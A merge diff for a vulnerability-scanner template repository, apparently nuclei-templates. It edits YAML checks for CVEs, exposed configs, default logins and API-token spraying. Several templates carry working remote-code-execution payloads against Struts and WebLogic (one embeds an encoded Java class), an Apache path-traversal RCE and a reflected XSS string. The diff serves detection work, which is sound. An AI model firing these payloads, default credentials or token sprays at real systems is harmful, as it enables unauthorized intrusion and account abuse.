Merge pull request #102 from projectdiscovery/master

Updation

.nuclei-ignore

@@ -14,8 +14,3 @@ tags:
 
 # files is a list of files to ignore template execution
 # unless asked for by the user.
-
-files:
-  - "token-spray/"
-
-

cves/2013/CVE-2013-2251.yaml

@@ -11,25 +11,19 @@ info:
 requests:
   - raw:
       - |
-        GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+        GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
         Accept: */*
-        Accept-Language: en
 
       - |
-        GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+        GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
         Accept: */*
-        Accept-Language: en
 
       - |
-        GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
+        GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
         Accept: */*
-        Accept-Language: en
 
     payloads:
       params:
@@ -40,11 +34,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: status
+        condition: or
         status:
           - 200
           - 400
-        condition: or
+
       - type: regex
+        part: body
         regex:
           - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
-        part: body

cves/2016/CVE-2016-1000143.yaml

@@ -0,0 +1,37 @@
+id: CVE-2016-1000143
+
+info:
+  name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
+  reference:
+    - http://www.vapidlabs.com/wp/wp_advisory.php?v=780
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
+  tags: cve,cve2016,wordpress,wp-plugin,xss
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2016-1000143
+    cwe-id: CWE-79
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '</script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

cves/2017/CVE-2017-17562.yaml

@@ -91,15 +91,16 @@ requests:
         - webviewer
         - welcome
 
-    attack: sniper
     stop-at-first-match: true
     matchers-condition: and
     matchers:
+
       - type: status
         status:
           - 200
+
       - type: word
+        condition: and
         words:
           - "environment variable"
           - "display library search paths"
-        condition: and

cves/2019/CVE-2019-17382.yaml

@@ -22,14 +22,16 @@ requests:
 
     payloads:
       ids: helpers/wordlists/numbers.txt
-    attack: sniper
+
     threads: 50
     stop-at-first-match: true
     matchers-condition: and
     matchers:
+
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - "<title>Dashboard</title>"

cves/2019/CVE-2019-2729.yaml

@@ -0,0 +1,32 @@
+id: CVE-2019-2729
+
+info:
+  name: Oracle WebLogic Server Administration Console Handle RCE
+  author: igibanez
+  severity: critical
+  description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2019-2729
+  tags: cve,cve2019,oracle,rce,weblogic
+
+requests:
+  - raw:
+      - |
+        POST /wls-wsat/CoordinatorPortType HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>echo${IFS}9272-9102-EVC|rev</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "CVE-2019-2729"
+
+      - type: status
+        status:
+          - 200

cves/2020/CVE-2020-14882.yaml

@@ -28,8 +28,7 @@ requests:
       - |
         POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
         Host: {{Hostname}}
-        cmd: §exec§
-        Connection: close
+        cmd: {{exec}}
         Content-Type: application/x-www-form-urlencoded; charset=utf-8
 
         _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@@ -41,12 +40,12 @@ requests:
 
     matchers-condition: and
     matchers:
+
       - type: regex
+        condition: or
         regex:
           - "root:.*:0:0:"
           - "\\[(font|extension|file)s\\]"
-        condition: or
-        part: body
 
       - type: status
         status:

cves/2020/CVE-2020-7961.yaml

@@ -31,11 +31,12 @@ requests:
       command:
         - "systeminfo"  # Windows
         - "lsb_release -a"  # Linux
-    attack: sniper
 
     matchers-condition: and
     matchers:
+
       - type: regex
+        condition: or
         regex:
           - "OS Name:.*Microsoft Windows"
           - "Distributor ID:"

cves/2020/CVE-2020-9757.yaml

@@ -22,6 +22,8 @@ requests:
     path:
       - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
       - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
+
+    skip-variables-check: true
     matchers-condition: and
     matchers:
       - type: status

cves/2021/CVE-2021-33044.yaml

@@ -40,7 +40,7 @@ requests:
       - type: word
         part: body
         words:
-          - "true"
+          - "\"result\":true"
           - "id"
           - "params"
           - "session"

cves/2021/CVE-2021-41773.yaml

@@ -31,7 +31,7 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev
+        echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
 
     matchers-condition: or
     matchers:
@@ -44,4 +44,4 @@ requests:
       - type: word
         name: RCE
         words:
-          - "CVE-2021-41773"
+          - "CVE-2021-41773-POC"

default-logins/grafana/grafana-default-login.yaml

@@ -1,4 +1,5 @@
 id: grafana-default-login
+
 info:
   name: Grafana Default Login
   author: pdteam
@@ -26,7 +27,6 @@ requests:
       username:
         - admin
         - admin
-
       password:
         - prom-operator
         - admin
@@ -35,15 +35,13 @@ requests:
     matchers:
       - type: word
         words:
-          - grafana_session
+          - "grafana_session" # Login cookie
         part: header
-        # Check for 'grafana_session' cookie on valid login in the response header.
 
       - type: word
-        words:
-          - Logged in
         part: body
-        # Check for valid string on valid login.
+        words:
+          - "Logged in" # Logged in keyword
 
       - type: status
         status:

default-logins/hp/hp-switch-default-login.yaml

@@ -20,15 +20,13 @@ requests:
       username:
         - admin
 
-    attack: sniper
-
     matchers-condition: and
     matchers:
       - type: word
+        condition: and
         words:
           - '"redirect": "/htdocs/pages/main/main.lsp"'
           - '"error": ""'
-        condition: and
 
       - type: status
         status:

default-logins/idemia/idemia-biometrics-default-login.yaml

@@ -18,22 +18,21 @@ requests:
 
     payloads:
       password:
-        - 12345
-    attack: sniper
+        - "12345"
 
     matchers-condition: and
     matchers:
       - type: word
+        condition: and
         words:
           - "session_id="
           - "resource"
-        condition: and
 
       - type: word
-        words:
-          - "Invalid Password"
         part: body
         negative: true
+        words:
+          - "Invalid Password"
 
       - type: status
         status:

exposed-panels/samsung-printer-detect.yaml

@@ -0,0 +1,24 @@
+id: samsung-printer-detect
+
+info:
+  name: SAMSUNG Printer Detection
+  author: pussycat0x
+  severity: info
+  tags: iot,panel
+  metadata:
+    fofa-dork: 'app="SAMSUNG-Printer"'
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sws/index.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title> SyncThru Web Service </title>'
+
+      - type: status
+        status:
+          - 200

exposures/configs/github-workflows-disclosure.yaml

@@ -36,6 +36,7 @@ requests:
       - "{{BaseURL}}/.github/workflows/ci-daily.yml"
       - "{{BaseURL}}/.github/workflows/ci-issues.yml"
       - "{{BaseURL}}/.github/workflows/smoosh-status.yml"
+      - "{{BaseURL}}/.github/workflows/snyk.yml"
 
     matchers-condition: and
     matchers:

exposures/configs/gruntfile-exposure.yaml

@@ -0,0 +1,29 @@
+id: gruntfile-exposure
+
+info:
+  name: Gruntfile Exposure
+  author: sbani
+  severity: info
+  reference: https://gruntjs.com/sample-gruntfile
+  tags: config,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Gruntfile.js"
+      - "{{BaseURL}}/Gruntfile.coffee"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        condition: and
+        words:
+          - "module.exports"
+          - "grunt"
+
+      - type: status
+        status:
+          - 200

exposures/configs/jetbrains-datasources.yaml

@@ -0,0 +1,24 @@
+id: jetbrains-datasource
+
+info:
+  name: Jetbrains IDE DataSources exposure
+  author: FlorianMaak
+  severity: info
+  description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure.
+  tags: config,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.idea/dataSources.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DataSourceManagerImpl"
+        part: body
+
+      - type: status
+        status:
+          - 200

exposures/configs/symfony-security-config.yaml

@@ -0,0 +1,30 @@
+id: symfony-security-config
+
+info:
+  name: Symfony Security Configuration Exposure
+  author: dahse89
+  severity: info
+  reference:
+    - https://symfony2-document.readthedocs.io/en/latest/book/security.html
+    - https://symfony.com/doc/current/reference/configuration/security.html
+  tags: config,exposure,symfony
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config/packages/security.yaml"
+      - "{{BaseURL}}/app/config/security.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "security:"
+          - "firewalls:"
+          - "access_control:"
+        condition: and
+        part: body

exposures/logs/access-log.yaml

@@ -10,6 +10,9 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/access.log"
+      - "{{BaseURL}}/log/access.log"
+      - "{{BaseURL}}/logs/access.log"
+      - "{{BaseURL}}/application/logs/access.log"
 
     matchers-condition: and
     matchers:

exposures/logs/error-logs.yaml

@@ -45,6 +45,8 @@ requests:
           - "script headers"
           - "Broken pipe"
           - "Array"
+          - "Exception"
+          - "Fatal"
         condition: or
 
       - type: word

exposures/logs/php-warning.yaml

@@ -1,25 +0,0 @@
-id: php-warning
-
-info:
-  name: PHP warning
-  author: dhiyaneshDK
-  severity: low
-  reference: https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22
-  tags: exposure,php,debug
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - '(?m)^<title>([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$'
-
-      - type: status
-        status:
-          - 500
-          - 503
-        condition: or

fuzzing/adminer-panel-fuzz.yaml

@@ -23,17 +23,17 @@ requests:
     payloads:
       path: helpers/wordlists/adminer-paths.txt
 
-    attack: sniper
     threads: 50
     stop-at-first-match: true
     matchers-condition: and
     matchers:
 
       - type: word
+        condition: and
         words:
           - "- Adminer</title>"
-          - "partial(verifyVersion, "
-        condition: and
+          - "partial(verifyVersion"
+
       - type: status
         status:
           - 200

fuzzing/mdb-database-file.yaml

@@ -14,12 +14,10 @@ requests:
         Host: {{Hostname}}
         Origin: {{BaseURL}}
         Accept-Language: en-US,en;q=0.9
-        Connection: close
 
     payloads:
       mdbPaths: helpers/wordlists/mdb-paths.txt
 
-    attack: sniper
     threads: 50
     max-size: 500 # Size in bytes - Max Size to read from server response
     stop-at-first-match: true

fuzzing/prestashop-module-fuzz.yaml

@@ -1,4 +1,5 @@
 id: prestashop-module-fuzz
+
 info:
   name: Prestashop Modules Enumeration
   author: meme-lord
@@ -16,19 +17,18 @@ requests:
 
     payloads:
       path: helpers/wordlists/prestashop-modules.txt
-    attack: sniper
-    threads: 50
 
+    threads: 50
     matchers-condition: and
     matchers:
       - type: word
+        condition: and
         words:
           - "<module>"
           - "<name>"
           - "<displayName>"
           - "<is_configurable>"
           - "</module>"
-        condition: and
 
       - type: status
         status:

fuzzing/wordpress-plugins-detect.yaml

@@ -1,4 +1,5 @@
 id: wordpress-plugins-detect
+
 info:
   name: WordPress Plugins Detection
   author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
 
     payloads:
       pluginSlug: helpers/wordlists/wordpress-plugins.txt
-    attack: sniper
-    threads: 50
-    redirects: true
-    max-redirects: 1
 
+    threads: 50
     matchers-condition: and
     matchers:
       - type: status

fuzzing/wordpress-themes-detect.yaml

@@ -1,4 +1,5 @@
 id: wordpress-themes-detect
+
 info:
   name: WordPress Theme Detection
   author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
 
     payloads:
       themeSlug: helpers/wordlists/wordpress-themes.txt
-    attack: sniper
-    threads: 50
-    redirects: true
-    max-redirects: 1
 
+    threads: 50
     matchers-condition: and
     matchers:
       - type: status

miscellaneous/ntlm-directories.yaml

@@ -14,6 +14,7 @@ requests:
         Host: {{Hostname}}
         Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
 
+    threads: 50
     payloads:
       path:
         - /
@@ -63,9 +64,6 @@ requests:
         - /webticket/webticketservice.svcabs/
         - /adfs/services/trust/2005/windowstransport
 
-    attack: sniper
-    threads: 50
-
     matchers-condition: and
     matchers:
       - type: dsl

misconfiguration/php-errors.yaml

@@ -2,7 +2,10 @@ id: php-errors
 
 info:
   name: PHP errors
-  author: w4cky_,geeknik
+  author: w4cky_,geeknik,dhiyaneshDK
+  reference:
+    - https://www.shodan.io/search?query=%22Fatal+error%22
+    - https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22
   severity: info
   tags: debug,php
 
@@ -20,6 +23,7 @@ requests:
           - '(?i)MySQL server version for the right syntax to use near'
           - '(?i)MySQL cannot create a temporary file'
           - '(?i)PHP (Warning|Error)'
+          - '(?m)^<title>([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$'
           - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
           - '(?i)failed to open stream\:'
           - '(?i)SAFE MODE Restriction in effect'

network/detect-jabber-xmpp.yaml

@@ -0,0 +1,24 @@
+id: detect-jabber-xmpp
+
+info:
+  name: Detects Jabber XMPP Instance
+  author: geeknik
+  severity: info
+  description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
+  reference: https://datatracker.ietf.org/doc/html/rfc6120
+  tags: network,jabber,xmpp
+
+network:
+  - inputs:
+      - data: "a\n"
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:5222"
+
+    matchers:
+      - type: word
+        words:
+          - "stream:stream xmlns:stream"
+          - "stream:error xmlns:stream"
+        condition: or

technologies/aws/aws-bucket-service.yaml

@@ -18,7 +18,7 @@ requests:
           - contains(tolower(all_headers), 'x-amz-bucket')
           - contains(tolower(all_headers), 'x-amz-request')
           - contains(tolower(all_headers), 'x-amz-id')
-          - contains(tolower(all_headers), 'AmazonS3')
+          - contains(tolower(all_headers), 'amazons3')
         part: header
         condition: or
 

token-spray/README.md

@@ -1,15 +1,19 @@
 ## About
+
 This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
 
 ## Usage
-You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
 
-```bash
-# Run Nuclei specifying all the api templates:
+token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
 
-nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
+```console
+# Running token-spray templates against a single token to test
+nuclei -t token-spray/ -var token=random-token-to-test
+
+# Running token-spray templates against a file containing multiple new line delimited tokens
+nuclei -t token-spray/ -var token=file_with_tokens.txt
 ```
 
 ## Credits
-These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
 
+These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.

token-spray/asana.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,asana
 
+self-contained: true
 requests:
   - method: GET
     path:
@@ -16,6 +17,6 @@ requests:
 
     matchers:
       - type: status
+        negative: true
         status:
           - 401
-        negative: true

token-spray/bingmaps.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,bing,maps,bingmaps
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/bitly.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,bitly
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/buildkite.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,buildkite
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/buttercms.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,buttercms
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/calendly.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,calendly
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/circleci.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,circle,circleci
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/deviantart.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,deviantart
 
+self-contained: true
 requests:
   - method: POST
     path:

token-spray/dropbox.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,dropbox
 
+self-contained: true
 requests:
   - method: POST
     path:

token-spray/github.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,github
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-autocomplete.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,autocomplete
 
+self-contained: true
 requests:
